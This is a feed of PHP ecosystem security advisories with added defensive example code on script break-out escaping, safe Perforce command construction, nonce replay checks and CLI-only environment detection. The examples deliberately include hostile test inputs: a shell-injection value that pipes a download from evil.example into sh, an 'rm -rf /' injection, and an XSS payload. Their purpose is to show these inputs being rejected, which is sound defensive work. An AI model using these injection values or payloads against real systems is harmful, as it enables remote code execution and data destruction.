XSS in profiler HtmlDumper via unescaped template and profile names
More info at https://symfony.com/cve-2026-47730...
`template_from_string()` escapes a SourcePolicy-driven sandbox via synthesized template name
More info at https://symfony.com/cve-2026-46634...
Arbitrary PHP code execution via `_self.(<string>)` macro-reference compilation
More info at https://symfony.com/cve-2026-46640...
Sandbox property and method bypass via object-destructuring assignment
More info at https://symfony.com/cve-2026-46639...
SQL Injection in extension "News system" (news)
More info at https://typo3.org/security/advisory/typo3-ext-sa-2026-010...
TYPO3-EXT-SA-2026-009: Broken Access Control in extension "Frontend User Registration" (sf_register)
More info at https://typo3.org/security/advisory/typo3-ext-sa-2026-009...
TYPO3-EXT-SA-2026-012: SQL Injection in extension "Address List" (tt_address)
More info at https://typo3.org/security/advisory/typo3-ext-sa-2026-012...
TYPO3-EXT-SA-2026-011: Path Traversal in extension "Faceted Search" (ke_search)
More info at https://typo3.org/security/advisory/typo3-ext-sa-2026-011...
TYPO3-EXT-SA-2026-011: XML External Entity Injection in extension "Faceted Search" (ke_search)
More info at https://typo3.org/security/advisory/typo3-ext-sa-2026-011...
GitHub Actions-issued GITHUB_TOKEN disclosure in GitHub Actions logs
More info at https://github.com/composer/composer/security/advisories/GHSA-f9f8-rm49-7jv2...
GitHub Actions-issued GITHUB_TOKEN disclosure in GitHub Actions logs
Summary: Composer leaks to stderr the full contents of tokens configured as GitHub OAuth tokens if they do not match Composer's expected format for such tokens. GitHub has introduced a new format for GitHub Actions GITHUB_TOKEN values. These tokens are validated in the same way by Composer on GitHu...
TYPO3-EXT-SA-2026-008: Remote Code Execution in extension "Site Crawler" (crawler)
More info at https://typo3.org/security/advisory/typo3-ext-sa-2026-008...
Remote code execution via evaluation of user-controlled input in validation rules
Impact: A remote code execution (RCE) vulnerability affects versions 0.13.2 through 0.13.21. When documentation endpoints are publicly accessible and validation rules reference user-controlled input, request-supplied data may be evaluated during documentation generation, leading to execution of...
Cross-site scripting (XSS) via script break-out in toScript() output
What's Changed: Escape HTML tags in toScript output to prevent script break-out, by @freekmurze in https://github.com/spatie/schema-org/pull/242. Values containing `</script>` passed as schema properties could break out of the generated `<script>` block and execute injected HTML when the value was attacker-controlled...
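The break-out above is worth seeing end to end. The following is an added example, not spatie/schema-org's code: it embeds a schema array in a JSON-LD `<script>` block the unsafe way (raw `json_encode` output, slashes unescaped) and the safe way (`JSON_HEX_TAG`, which encodes `<` and `>` as `\u003C`/`\u003E` so the JSON can never contain a literal `</script`). The helper names and the sample headline are constructed for the example.

```php
<?php
declare(strict_types=1);

// Added example, not spatie/schema-org code. An HTML tokenizer ends script
// content at the first "</script" it meets, whatever the JSON quoting around
// it, so the encoded JSON must never contain a literal "<".

function jsonLdScript(array $schema): string
{
    // JSON_HEX_TAG neutralises "<" and ">"; the other HEX flags cover "&", "'"
    // and '"' for documents parsed as XHTML or placed in attributes.
    $json = json_encode(
        $schema,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
            | JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE | JSON_THROW_ON_ERROR
    );
    return '<script type="application/ld+json">' . $json . '</script>';
}

// The pattern the advisory describes: json_encode output dropped into the
// block as-is. With JSON_UNESCAPED_SLASHES the "/" in "</script>" survives
// (the default "\/" escaping would have masked it), so the value closes the
// block early and the rest is parsed as HTML.
function unescapedJsonLdScript(array $schema): string
{
    $json = json_encode($schema, JSON_UNESCAPED_SLASHES | JSON_THROW_ON_ERROR);
    return '<script type="application/ld+json">' . $json . '</script>';
}

// How many closing script tags a browser would see in the markup.
function scriptCloses(string $html): int
{
    return (int) preg_match_all('~</script~i', $html);
}

// Whether the safe block still decodes to the original data.
function roundTrips(string $html, array $schema): bool
{
    $open = '<script type="application/ld+json">';
    $json = substr($html, strlen($open), -strlen('</script>'));
    return json_decode($json, true, 512, JSON_THROW_ON_ERROR) === $schema;
}

// Constructed attacker-controlled headline.
$schema = [
    '@context' => 'https://schema.org',
    '@type'    => 'Article',
    'headline' => '</script><img src=x onerror=alert(1)>',
];

$unsafe = unescapedJsonLdScript($schema);
$safe   = jsonLdScript($schema);

echo $unsafe, PHP_EOL;
echo $safe, PHP_EOL;
echo 'closing tags, unsafe vs safe: ', scriptCloses($unsafe), ' vs ', scriptCloses($safe), PHP_EOL;
echo 'safe block decodes to the original data: ', var_export(roundTrips($safe, $schema), true), PHP_EOL;
```

The unsafe block contains two `</script` sequences (the injected one and the genuine close), the safe block only one; consumers that `json_decode` the block are unaffected because `\u003C` is ordinary JSON.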
Argument injection via newline in PHP INI values forwarded to child processes
Impact: PHPUnit forwards PHP INI settings to child processes used for isolated/PHPT test execution as `-d name=value` command-line arguments without neutralizing INI metacharacters. Because PHP's INI parser interprets `"` as a string delimiter, `;` as the start of a comment, and most importantly a newli...
CVE-2026-24749 - DBFile permission bypass
More info at https://www.silverstripe.org/download/security-releases/cve-2026-24749...
Command injection via malicious Perforce repository definition
Impact: The Perforce::generateP4Command method constructed shell commands by interpolating user-supplied Perforce connection parameters (port, user, client) without proper escaping. An attacker controlling a repository configuration in a malicious composer.json declaring a Perforce VCS repository...
Command injection via malicious Perforce source reference/url
Impact: The Perforce::syncCodeBase method appended the $sourceReference parameter to a shell command without proper escaping, allowing an attacker to inject arbitrary commands through a crafted source reference containing shell metacharacters. Further, as in GHSA-wg36-wvj6-r67p / CVE-2026-40176, the...
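Both Perforce advisories above come down to repository-supplied strings reaching a shell. The following added example (not Composer's code) builds the `p4` invocation as an argv array with the port, user, client and source reference validated against strict patterns, so nothing from composer.json is ever interpreted by a shell; the `sync -f //...@<ref>` syntax, the helper names and the sample inputs are assumptions made for the illustration.

```php
<?php
declare(strict_types=1);

// Added example, not Composer's code: assemble the p4 invocation as an argv
// array with every repository-supplied value validated, instead of
// interpolating port/user/client and the source reference into a shell string.
// The sync syntax (sync -f //...@<ref>) is an assumption for illustration.

function validatedP4Token(string $what, string $value, string $pattern): string
{
    if (!preg_match($pattern, $value)) {
        throw new InvalidArgumentException("refusing p4 $what from repository config: " . json_encode($value));
    }
    return $value;
}

/** @return list<string> argv for proc_open()/Symfony Process, no shell */
function p4SyncCommand(string $port, string $user, string $client, ?string $sourceReference): array
{
    $argv = [
        'p4',
        '-p', validatedP4Token('port', $port, '~\A(?:(?:ssl|tcp):)?[A-Za-z0-9.\-]+(?::\d{1,5})?\z~'),
        '-u', validatedP4Token('user', $user, '/\A[A-Za-z0-9._\-]+\z/'),
        '-c', validatedP4Token('client', $client, '/\A[A-Za-z0-9._\-]+\z/'),
        'sync', '-f',
    ];
    $spec = '//...';
    if ($sourceReference !== null) {
        // changelist number or label name, nothing a shell or p4 could misread
        $spec .= '@' . validatedP4Token('source reference', $sourceReference, '/\A[A-Za-z0-9._\-]+\z/');
    }
    $argv[] = $spec;
    return $argv;
}

/** Only if a shell string is unavoidable: quote every element. */
function asShellLine(array $argv): string
{
    return implode(' ', array_map('escapeshellarg', $argv));
}

// Constructed inputs: a benign configuration, then two values of the kind a
// malicious composer.json could carry.
echo asShellLine(p4SyncCommand('perforce.example:1666', 'build', 'build-ws', '12345')), PHP_EOL;

foreach ([
    ['1666; curl http://evil.example/x | sh', 'build', 'ws', '1'],
    ['perforce.example:1666', 'build', 'ws', '1; rm -rf /'],
] as [$port, $user, $client, $ref]) {
    try {
        p4SyncCommand($port, $user, $client, $ref);
    } catch (InvalidArgumentException $e) {
        echo $e->getMessage(), PHP_EOL;
    }
}
```

Validation is deliberately an allow-list per field rather than `escapeshellarg()` alone: quoting stops the shell, but a value such as a port of `-x` could still be read by `p4` as an option, which the pattern rules out as well.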
TYPO3-EXT-SA-2026-013: Remote Code Execution in extension "Content Element Selector" (ceselector)
More info at https://typo3.org/security/advisory/typo3-ext-sa-2026-013...
Denial of Service via "MadeYouReset" vulnerability
Versions of amphp/http-server prior to 3.4.4 for the 3.x release branch and prior to 2.1.10 for the 2.x release branch are vulnerable to the HTTP/2 "MadeYouReset" DoS attack described by CVE-2025-8671 and https://kb.cert.org/vuls/id/767506. In versions 3.4.4 and 2.1.10, stream reset protection ha...
Unsafe Deserialization in PHPT Code Coverage Handling
Overview: A vulnerability has been discovered involving unsafe deserialization of code coverage data in PHPT test execution. The vulnerability exists in the cleanupForCoverage method, which deserializes code coverage files without validation, potentially allowing remote code execution if malicious...
Missing check that a point is on the prime subgroup for Edwards25519
More info at https://00f.net/2025/12/30/libsodium-vulnerability...
Key Commitment Issues in S3 Encryption Clients
More info at https://aws.amazon.com/security/security-bulletins/AWS-2025-032/...
TYPO3-EXT-SA-2025-007: Multiple vulnerabilities in extension "Backup Plus" (ns_backup)
More info at https://typo3.org/security/advisory/typo3-ext-sa-2025-007...
TYPO3-EXT-SA-2025-005: Cross-Site Scripting in extension "[clickstorm] SEO" (cs_seo)
More info at https://typo3.org/security/advisory/typo3-ext-sa-2025-005...
TYPO3-EXT-SA-2025-008: Multiple vulnerabilities in extension "Front End User Registration" (sr_feuser_register)
More info at https://typo3.org/security/advisory/typo3-ext-sa-2025-008...
symfony/ux-live-component Unsanitized HTML attribute injection via ComponentAttributes
More info at https://symfony.com/blog/symfony-ux-cve-2025-47946-unsanitized-html-attribute-injection-via-componentattributes...
symfony/ux-twig-component Unsanitized HTML attribute injection via ComponentAttributes
More info at https://symfony.com/blog/symfony-ux-cve-2025-47946-unsanitized-html-attribute-injection-via-componentattributes...
TYPO3-EXT-SA-2025-004: Insecure Direct Object Reference in extension "Download manager" (reint_downloadmanager)
More info at https://typo3.org/security/advisory/typo3-ext-sa-2025-004...
TYPO3-EXT-SA-2025-006: Insecure Direct Object Reference in extension "femanager" (femanager)
More info at https://typo3.org/security/advisory/typo3-ext-sa-2025-006...
SS-2025-001 - User enumeration via timing attack
More info at https://www.silverstripe.org/download/security-releases/ss-2025-001...
CVE-2025-30148 - XSS vulnerability in HTML editor
More info at https://www.silverstripe.org/download/security-releases/cve-2025-30148...
CVE-2025-25197 - XSS attack in elemental "Content blocks in use" report
More info at https://www.silverstripe.org/download/security-releases/cve-2025-25197...
GraphQL grant on a property might be cached with different objects
Original message: I found an issue with security grants on properties in the GraphQL ItemNormalizer: If you use something like `#[ApiProperty(security: 'is_granted("PROPERTY_READ", object, property)')]` on a member of an entity, the grant gets cached and is only evaluated once, even if the object in...
GraphQL query operations security can be bypassed
Summary: Using the Relay special node type you can bypass the configured security on an operation. Details: Here is an example of how to apply security configurations for the GraphQL operations: `#[ApiResource(security: "is_granted('ROLE_USER')", operations: [/* ... */], graphQlOperations: [new`...
TYPO3-EXT-SA-2025-002: Cross-Site Scripting in extension “Additional TCA” (additional_tca)
More info at https://typo3.org/security/advisory/typo3-ext-sa-2025-002...
TYPO3-EXT-SA-2025-003: Multiple vulnerabilities in extension “[clickstorm] SEO” (cs_seo)
More info at https://typo3.org/security/advisory/typo3-ext-sa-2025-003...
Missing output escaping for the null coalesce operator
More info at https://symfony.com/blog/twig-cve-2025-24374-missing-output-escaping-for-the-null-coalesce-operator...
TYPO3-EXT-SA-2025-001: Account Takeover in extension "OpenID Connect Authentication" (oidc)
More info at https://typo3.org/security/advisory/typo3-ext-sa-2025-001...
CVE-2024-53277 - XSS in form messages
More info at https://www.silverstripe.org/download/security-releases/cve-2024-53277...
CVE-2024-47605 - XSS via insert media remote file oembed
More info at https://www.silverstripe.org/download/security-releases/cve-2024-47605...
SS-2024-002 - Reflected Cross Site Scripting (XSS) in error message
More info at https://www.silverstripe.org/download/security-releases/ss-2024-002...
Insufficient nonce entropy
Impact: Nonce generation does not use sufficient entropy nor a cryptographically secure pseudorandom source (https://github.com/guzzle/oauth-subscriber/blob/0.8.0/src/Oauth1.php#L192). This can leave servers vulnerable to replay attacks when TLS is not used. Patches: Upgrade to version 0.8.1 or higher...
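The nonce is the only thing that lets an OAuth 1.0 server tell a replayed request from a fresh one, which is why its entropy matters. As an added example (not guzzle/oauth-subscriber's code), the block below draws the client nonce from the OS CSPRNG and pairs it with the server-side check that consumes it: a bounded cache of `(consumer, timestamp, nonce)` tuples within a clock-skew window. The 300-second window, the class name and the sample exchange are assumptions; it needs PHP 8 for constructor promotion.

```php
<?php
declare(strict_types=1);

// Added example, not guzzle/oauth-subscriber code: a client nonce from the OS
// CSPRNG, and the replay check a server performs on it. The 300 s window is
// an assumption.

function generateNonce(): string
{
    // 128 bits of randomness; uniqid(), mt_rand() and time-derived hashes are
    // guessable, which lets an attacker predict or collide nonces.
    return bin2hex(random_bytes(16));
}

final class NonceCache
{
    /** @var array<string,int> "consumer|timestamp|nonce" => time first seen */
    private array $seen = [];

    public function __construct(private int $windowSeconds = 300) {}

    /**
     * Accept a request once: reject timestamps outside the window and any
     * (consumer, timestamp, nonce) tuple already recorded inside it.
     */
    public function accept(string $consumerKey, int $timestamp, string $nonce, ?int $now = null): bool
    {
        $now ??= time();
        if (abs($now - $timestamp) > $this->windowSeconds) {
            return false; // stale or from the future: no cache entry needed
        }
        // drop entries that aged out of the window so the cache stays bounded
        foreach ($this->seen as $key => $firstSeen) {
            if ($now - $firstSeen > $this->windowSeconds) {
                unset($this->seen[$key]);
            }
        }
        $key = "$consumerKey|$timestamp|$nonce";
        if (isset($this->seen[$key])) {
            return false; // replay
        }
        $this->seen[$key] = $now;
        return true;
    }
}

// Constructed exchange: one genuine request, the same request replayed by a
// network attacker who captured it over plaintext HTTP, then a stale request.
$cache = new NonceCache();
$ts    = time();
$nonce = generateNonce();
var_dump($cache->accept('consumer-key', $ts, $nonce));                  // first use
var_dump($cache->accept('consumer-key', $ts, $nonce));                  // replay of the capture
var_dump($cache->accept('consumer-key', $ts - 3600, generateNonce()));  // outside the window
```

With a predictable nonce an attacker does not even need the capture: they can submit a request carrying the nonce the client is about to use, so the cache rejects the legitimate one. Randomness on the client and the cache on the server are two halves of the same control.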
Laravel Reflected XSS via Route Parameter in Debug-Mode Error Page
Vulnerability Overview: The Laravel framework versions between 11.9.0 and 11.35.1 are susceptible to reflected cross-site scripting due to improper encoding of route parameters in the debug-mode error page. Identifier:...
Laravel Reflected XSS via Request Parameter in Debug-Mode Error Page
Vulnerability Overview: The Laravel framework versions between 11.9.0 and 11.35.1 are susceptible to reflected cross-site scripting due to improper encoding of request parameters in the debug-mode error page. Identifier:...
Laravel environment manipulation via query string
Description: When the `register_argc_argv` PHP directive is set to `on`, and users call any URL with a specially crafted query string, they are able to change the environment used by the framework when handling the request. Resolution: The framework now ignores argv values for environment detection on...
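The mechanism is easy to miss: with `register_argc_argv=On`, web SAPIs populate `$_SERVER['argv']` from the query string (split on `+`), so an environment detector that reads `--env=` from argv regardless of SAPI can be steered by any visitor. The block below is an added example, not Laravel's code: it gates argv parsing on `PHP_SAPI === 'cli'` and shows the same argv producing different answers under a web SAPI and the CLI. The `detectEnvironment` helper, the `APP_ENV` fallback and the sample `$_SERVER` arrays are constructed for the illustration (PHP 8 for `str_starts_with`).

```php
<?php
declare(strict_types=1);

// Added example, not Laravel's code: environment detection that reads --env
// from argv only under the CLI SAPI. With register_argc_argv=On, a web SAPI
// fills $_SERVER['argv'] from the query string (split on '+'), so a request
// such as GET /?--env=local would otherwise choose the environment.

function detectEnvironment(array $server, string $sapi, string $default = 'production'): string
{
    if ($sapi === 'cli') {
        foreach ($server['argv'] ?? [] as $arg) {
            if (str_starts_with($arg, '--env=')) {
                $env = substr($arg, strlen('--env='));
                // plain names only; anything else falls through to the defaults
                if (preg_match('/\A[A-Za-z0-9_-]+\z/', $env)) {
                    return $env;
                }
            }
        }
    }
    return $server['APP_ENV'] ?? $default;
}

// Constructed inputs: the same argv under a web SAPI and under the CLI.
$webServer = [
    'REQUEST_METHOD' => 'GET',
    'QUERY_STRING'   => '--env=local',
    'argv'           => ['--env=local'], // what register_argc_argv=On produces
];
$cliServer = ['argv' => ['artisan', 'migrate', '--env=local']];

echo 'web request: ', detectEnvironment($webServer, 'fpm-fcgi'), PHP_EOL; // argv ignored
echo 'cli command: ', detectEnvironment($cliServer, 'cli'), PHP_EOL;      // --env honoured
echo 'this process: ', detectEnvironment($_SERVER, PHP_SAPI), PHP_EOL;    // real inputs
```

Gating on the SAPI is the right fix rather than tightening the pattern: a web client can put any well-formed name in the query string, so under a web SAPI argv must carry no authority at all.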